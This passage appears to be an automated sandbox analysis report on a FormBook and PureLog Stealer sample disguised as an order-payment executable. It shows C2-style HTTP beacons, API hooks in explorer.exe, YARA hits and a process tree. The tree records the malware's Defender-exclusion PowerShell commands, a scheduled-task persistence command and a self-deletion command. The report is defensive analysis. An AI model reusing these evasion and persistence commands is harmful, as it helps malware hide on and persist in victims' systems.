href='https://www.jmpwood.com/hd05?nddt40n=yavfKy4e49Ffd16wiS2AgqQIJavWi70Zom0UgwYqzxTsl8OUGxXc+tZJJXfXWFP%2F06dpjDbfXA%3D%3D&qN9=GZs8E2R84fNPO8q'>Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49715	3.33.130.190	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 09:40:54.313997984 CEST	181	OUT	GET /hd05/?nddt40n=H11Sq1KAmWy3TZ4g686+8cOrtC6/zVWn9hhmKxw0qAe7Dkpr8OJlJcVglPxuSZ3INis2/OJA+Q==&qN9=GZs8E2R84fNPO8q HTTP/1.1 Host: www.tuskerlogix.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 8, 2024 09:40:54.485974073 CEST	359	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 08 May 2024 07:40:54 GMT Content-Type: text/html Content-Length: 219 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 64 64 74 34 30 6e 3d 48 31 31 53 71 31 4b 41 6d 57 79 33 54 5a 34 67 36 38 36 2b 38 63 4f 72 74 43 36 2f 7a 56 57 6e 39 68 68 6d 4b 78 77 30 71 41 65 37 44 6b 70 72 38 4f 4a 6c 4a 63 56 67 6c 50 78 75 53 5a 33 49 4e 69 73 32 2f 4f 4a 41 2b 51 3d 3d 26 71 4e 39 3d 47 5a 73 38 45 32 52 38 34 66 4e 50 4f 38 71 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nddt40n=H11Sq1KAmWy3TZ4g686+8cOrtC6/zVWn9hhmKxw0qAe7Dkpr8OJlJcVglPxuSZ3INis2/OJA+Q==&qN9=GZs8E2R84fNPO8q"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49716	104.18.188.223	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 09:41:14.646552086 CEST	188	OUT	GET /hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=JEike4UQJLQakUPq/U16jy99RdjpJ2GxkH0s41l6Bypxc6148iCveXLCB/psYJ6oRgQVgJFOnA== HTTP/1.1 Host: www.businessjp6-51399.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 8, 2024 09:41:14.816478014 CEST	406	IN	HTTP/1.1 409 Conflict Date: Wed, 08 May 2024 07:41:14 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8807ce6719c22816-SEA Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49717	15.197.142.173	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 09:41:34.950251102 CEST	178	OUT	GET /hd05/?nddt40n=p/NjLOTdg7dIkWP+lnUu3znTw9xENS3rMvTkW+jKr2KjzzB4K5JtXdnsbZtTcOdHBVbqDwqHsQ==&qN9=GZs8E2R84fNPO8q HTTP/1.1 Host: www.stmbbill.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 8, 2024 09:41:35.131859064 CEST	266	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Wed, 08 May 2024 07:41:35 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE2
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE2
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE2
GetMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE2

Target ID:	0
Start time:	09:39:40
Start date:	08/05/2024
Path:	C:\Users\user\Desktop\order-payment094093.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\order-payment094093.exe"
Imagebase:	0xb30000
File size:	778'760 bytes
MD5 hash:	91592318966139C15E0171F341882FC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2141897621.0000000009770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2122231428.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:39:46
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe"
Imagebase:	0x6a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:39:46
Start date:	08/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:39:46
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NFOLsr.exe"
Imagebase:	0x6a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:39:46
Start date:	08/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:39:46
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp"
Imagebase:	0x330000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:39:46
Start date:	08/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:39:47
Start date:	08/05/2024
Path:	C:\Users\user\Desktop\order-payment094093.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\order-payment094093.exe"
Imagebase:	0x740000
File size:	778'760 bytes
MD5 hash:	91592318966139C15E0171F341882FC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:39:47
Start date:	08/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000A.00000002.3333395951.0000000011211000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:39:49
Start date:	08/05/2024
Path:	C:\Users\user\AppData\Roaming\NFOLsr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\NFOLsr.exe
Imagebase:	0xee0000
File size:	778'760 bytes
MD5 hash:	91592318966139C15E0171F341882FC8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2246034694.000000000331A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:39:49
Start date:	08/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:39:51
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\explorer.exe"
Imagebase:	0xa90000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	09:39:57
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\order-payment094093.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:39:57
Start date:	08/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:39:57
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp"
Imagebase:	0x330000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:39:57
Start date:	08/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:39:57
Start date:	08/05/2024
Path:	C:\Users\user\AppData\Roaming\NFOLsr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\NFOLsr.exe"
Imagebase:	0x830000
File size:	778'760 bytes
MD5 hash:	91592318966139C15E0171F341882FC8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:40:08
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netsh.exe"
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.5%
Total number of Nodes:	259
Total number of Limit Nodes:	22

Executed Functions

Function 02D43507 Relevance: 1.6, Strings: 1, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pBh], xrefs: 02D436DB

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID: pBh]
API String ID: 0-2174479048
Opcode ID: d74505a1713cd93442df39f605dc294c7ffa02150edd819bd91d4aea37b9791c
Instruction ID: 898f904c8440be80e765562aefdb8df0cf713f5e83e87f7715353c1dcec8f0f9
Opcode Fuzzy Hash: d74505a1713cd93442df39f605dc294c7ffa02150edd819bd91d4aea37b9791c
Instruction Fuzzy Hash: FFE17A70D04286DFCB54CFA9C4959AEFBB2FF89300B2592A9C455AB315DB34E942CF90

Function 02D4355A Relevance: 1.6, Strings: 1, Instructions: 365
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pBh], xrefs: 02D436DB

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID: pBh]
API String ID: 0-2174479048
Opcode ID: ce7efbcb4224c8ae7f3b9e2f17791282c97e02e24df9a5074ab5bc46d6137e9d
Instruction ID: a92fee5fd0234b86db22c5b603ed97d975b54df46f5840987dfd53037d26fce6
Opcode Fuzzy Hash: ce7efbcb4224c8ae7f3b9e2f17791282c97e02e24df9a5074ab5bc46d6137e9d
Instruction Fuzzy Hash: 9AE17970D04286DFCB54CFA9C4959AEFBB2FF89300B2592A9C455AB315DB34E942CF90

Function 02D43650 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

pBh], xrefs: 02D436DB

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID: pBh]
API String ID: 0-2174479048
Opcode ID: 51311da183e8be57dfe883bc37ee7bba28871fb1351a9ff5c1e45c5c20b687a6
Instruction ID: ce01ca333a03987ec414d407e7825691dc987826b2229a7568f1ae081a89bae0
Opcode Fuzzy Hash: 51311da183e8be57dfe883bc37ee7bba28871fb1351a9ff5c1e45c5c20b687a6
Instruction Fuzzy Hash: 56C14A74D0525ADFCB54DFA9C5809AEFBB2FF89300B249195D415AB314DB34EA82CF90

Function 02D41C91 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

sz , xrefs: 02D41D0A

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID: sz
API String ID: 0-4040756473
Opcode ID: 8d21fd16dd97bd343eee11df4201217b77a3ecf04671b83893102a917eff29d2
Instruction ID: 408f3fb5a369b8deb6533aa273fa42386f9ebd7c0240fa919d389b3f0101b52e
Opcode Fuzzy Hash: 8d21fd16dd97bd343eee11df4201217b77a3ecf04671b83893102a917eff29d2
Instruction Fuzzy Hash: 1D51F8B4D0420A8FDB48CFAAD5406AEFBF2FF89301F14D12AD459A7264D7748A41CF94

Function 0A048BDA Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2735d472aac4ea4e46e0e6bd71841db38e8c474f488c27450bf8ffbbdf517f
Instruction ID: cb2c1b41a1346d5820a1f192020df5dba09878c30f36c79b967e4170b5ad49f6
Opcode Fuzzy Hash: 7e2735d472aac4ea4e46e0e6bd71841db38e8c474f488c27450bf8ffbbdf517f
Instruction Fuzzy Hash: 60E1BD707016089FEB69EB65C850BAE77F6BF89700F14887ED246DB291CB34E805CB50

Function 02D41370 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a947b17c87181e88e387a0a7cc5c148c70d69483041b09d255dcee274895bf99
Instruction ID: 4150e9e5283cda41ad4ebe583f3f902f8b50859c4ab0e858792458407f0cdc09
Opcode Fuzzy Hash: a947b17c87181e88e387a0a7cc5c148c70d69483041b09d255dcee274895bf99
Instruction Fuzzy Hash: 4EB12670E042498FDB48CFA9C895ADEFBF2BF89310F14816AD409AB364DB359946CF54

Function 02D41418 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196290c78f83a5cdc072e15cbdaf2c57a7c2bf9c14020d50dad2d8dae92adf49
Instruction ID: ced81e1333f63e711ca3984e43a799966c7f04d61a6a946ac5ed529e08b4b321
Opcode Fuzzy Hash: 196290c78f83a5cdc072e15cbdaf2c57a7c2bf9c14020d50dad2d8dae92adf49
Instruction Fuzzy Hash: 7B81C574E002198FCB48CFAAC590ADEFBF2BF88310F14952AD519AB364DB359945CF54

Function 0A046E28 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403c0eee14f28657c52bc0d712e900f0a0ef6d8b24aa72994646bd806acfdcfd
Instruction ID: 2705226c0c0f9efc7f4f8fab5fe16b264ce916eded1e0342c04adee1a575f926
Opcode Fuzzy Hash: 403c0eee14f28657c52bc0d712e900f0a0ef6d8b24aa72994646bd806acfdcfd
Instruction Fuzzy Hash: 3771F4B1D05229DBEB64CF66C8447EDBBB6BF89300F10D1EAD409A7254EBB15A85CF40

Function 02D40871 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd165448427e95ea24ce6b83386f9c9392aee54dac162eb27083059504b85b8c
Instruction ID: 63af01a3fd30bdbbe9543d7b396ca8c755bba12f4f5dfbacf23bce036a5d7e85
Opcode Fuzzy Hash: fd165448427e95ea24ce6b83386f9c9392aee54dac162eb27083059504b85b8c
Instruction Fuzzy Hash: 74410C71E056198FEB58CFAAD94069EFBF3BFC8300F14D1AAD549A7224DB308A458F51

Function 098B9694 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c929eddc2364c33f58dd84498df727e76102f1378451a629cf60689e78fb645f
Instruction ID: 73ede5cfd96d867ae5a157b4eb5c53eaf9de24b91b7e8c270cbc3fb72a9970d8
Opcode Fuzzy Hash: c929eddc2364c33f58dd84498df727e76102f1378451a629cf60689e78fb645f
Instruction Fuzzy Hash: F64198B4D002489FDB14CFA9C684BDEBBF0BB09710F24A02AE915BB350DB75A944CF54

Function 02D426B1 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

